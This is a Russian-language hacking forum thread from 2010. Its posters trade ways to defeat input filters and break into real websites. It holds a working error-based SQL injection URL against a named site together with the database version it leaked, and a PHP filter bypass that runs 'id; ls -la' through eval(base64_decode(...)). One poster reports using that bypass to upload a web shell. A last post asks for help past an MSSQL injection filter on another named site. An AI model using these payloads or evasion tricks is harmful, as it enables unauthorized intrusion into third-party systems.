Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
16.05.2010, 23:03
|
|
Новичок
Регистрация: 27.12.2009
Сообщений: 16
Провел на форуме:
356323
Репутация:
0
|
|
в IPB есть такой фильтр
PHP код:
if ( ! IPS_DB_ALLOW_SUB_SELECTS )
{
# On the spot allowance?
if ( ! $this->allow_sub_select )
{
$_tmp = strtolower( $this->_removeAllQuotes($the_query) );
if ( preg_match( "#(?:/\*|\*/)#i", $_tmp ) )
{
$this->throwFatalError( "You are not allowed to use comments in your SQL query.\nAdd \ipsRegistry::DB()->allow_sub_select=1; before any query construct to allow them\n{$the_query}" );
return false;
}
if ( preg_match( "#[^_a-zA-Z]union[^_a-zA-Z]#s", $_tmp ) )
{
$this->throwFatalError( "UNION query joins are not allowed.\nAdd \ipsRegistry::DB()->allow_sub_select=1; before any query construct to allow them\n{$the_query}" );
return false;
}
else if ( preg_match_all( "#[^_a-zA-Z](select)[^_a-zA-Z]#s", $_tmp, $matches ) )
{
if ( count( $matches ) > 1 )
{
$this->throwFatalError( "SUB SELECT query joins are not allowed.\nAdd \ipsRegistry::DB()->allow_sub_select=1; before any query construct to allow them\n{$the_query}" );
return false;
}
}
}
}
Есть мысли как его обойти?
Последний раз редактировалось LaVey; 16.05.2010 в 23:05..
|
|
|
16.05.2010, 23:58
|
|
Новичок
Регистрация: 12.05.2010
Сообщений: 2
Провел на форуме:
33215
Репутация:
0
|
|
Код:
http://pocketbook.by/index.php?id=(select+1+from+(select+count(0),conca t((select+version()),floor(rand(0)*2))+from+inform ation_schema.tables+group+by+2+limit+1)a)--+
Что-то выводит
Ответ MySQL сервера:
Duplicate entry '5.1.44-community-log1' for key 'group_key'.
Не понятно |
|
|
|
17.05.2010, 00:00
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Есть инклуд, в котором режутся следующие символы:
"." (точка)
"/" (слеш)
"[ и ]" (квадратные скобки)
" " (пробел)
Вопрос - как залить шелл, если есть доступ к файлу с PHP-кодом. Тобишь выполнять команды и фукнкции я могу, к примеру echo(`ls`); - выведет список файлов. Но вот никакие аргументы никакой команде не могу передать, т.к. пробел режется. Работа с любыми массивами (к примеру $_GET[]) также отпадает, скобки режутся, а register_globals = Off. Всяческие функции типа copy() тоже не сработают, т.к. в пути к шеллу (а именно в "http://" или "ftp://") есть слеши, которые режутся. Через chr() не могу строку передать - конкатенация (точка) режется.
Вот такие вот дела, больше ничего придумать не могу...
|
|
|
|
17.05.2010, 00:00
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
Что-то выводит Ответ MySQL сервера: Duplicate entry '5.1.44-community-log1' for key 'group_key'. Не понятно
версия Mysql
Duplicate entry ' 5.1.44-community-log1' for key 'group_key'
|
|
|
|
17.05.2010, 00:02
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
Сообщение от Skipp
Код:
http://pocketbook.by/index.php?id=(select+1+from+(select+count(0),conca t((select+version()),floor(rand(0)*2))+from+inform ation_schema.tables+group+by+2+limit+1)a)--+
Что-то выводит
Ответ MySQL сервера:
Duplicate entry '5.1.44-community-log1' for key 'group_key'.
Не понятно ну так ты выводишь через blind, выводжишь в ошибку version()
что не понятно? Ты запросил вывести version(), вывело version() o_0
|
|
|
|
17.05.2010, 00:04
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
Сообщение от mailbrush
Есть инклуд, в котором режутся следующие символы:
"." (точка)
"/" (слеш)
"[ и ]" (квадратные скобки)
" " (пробел)
Вопрос - как залить шелл, если есть доступ к файлу с PHP-кодом. Тобишь выполнять команды и фукнкции я могу, к примеру echo(`ls`); - выведет список файлов. Но вот никакие аргументы никакой команде не могу передать, т.к. пробел режется. Работа с любыми массивами (к примеру $_GET[]) также отпадает, скобки режутся, а register_globals = Off. Всяческие функции типа copy() тоже не сработают, т.к. в пути к шеллу (а именно в "http://" или "ftp://") есть слеши, которые режутся. Через chr() не могу строку передать - конкатенация (точка) режется.
Вот такие вот дела, больше ничего придумать не могу...
немного не понял, а попробовать в base64 закодировать не вариант? Т.е. eval(base64_decode(aWQ7IGxzIC1sYQ)); 'id; ls -la';
Попробуй, может получится)
|
|
|
|
17.05.2010, 00:09
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Tigger, вот блин. Все перепробовал, а про base64 совсем забыл  Спасибо
|
|
|
|
17.05.2010, 00:16
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Такс, посмотрел знак "=" тоже режется. А он присутствует в конце base64... 
А, все, нашёл решение Щас попробую...
Спасиб, залил
А решение - просто в конец строки добавил лишние ";", таким образом, в base64 знаки "=" заменялись на обычные символы, тоесть на их код в базе64.
Последний раз редактировалось mailbrush; 17.05.2010 в 00:31..
|
|
|
|
17.05.2010, 00:18
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
Сообщение от mailbrush
Такс, посмотрел знак "=" тоже режется. А он присутствует в конце base64...
А, все, нашёл решение Щас попробую... дык попробуй код, что я дал!
т.е. без этого знака, я так делал, было все норм!
P.S. только что проверил, знак '=' не обязателен, можно даже без ковычек)
|
|
|
|
17.05.2010, 12:28
|
|
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404
Репутация:
564
|
|
Есть скуля http://www.stockhouse.com/tools/?page=%2Fshfn%2Farticle%2Easp%3FedtID%3D18744'
mssql скуля но select режется =\ что можно предпринять еще ?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
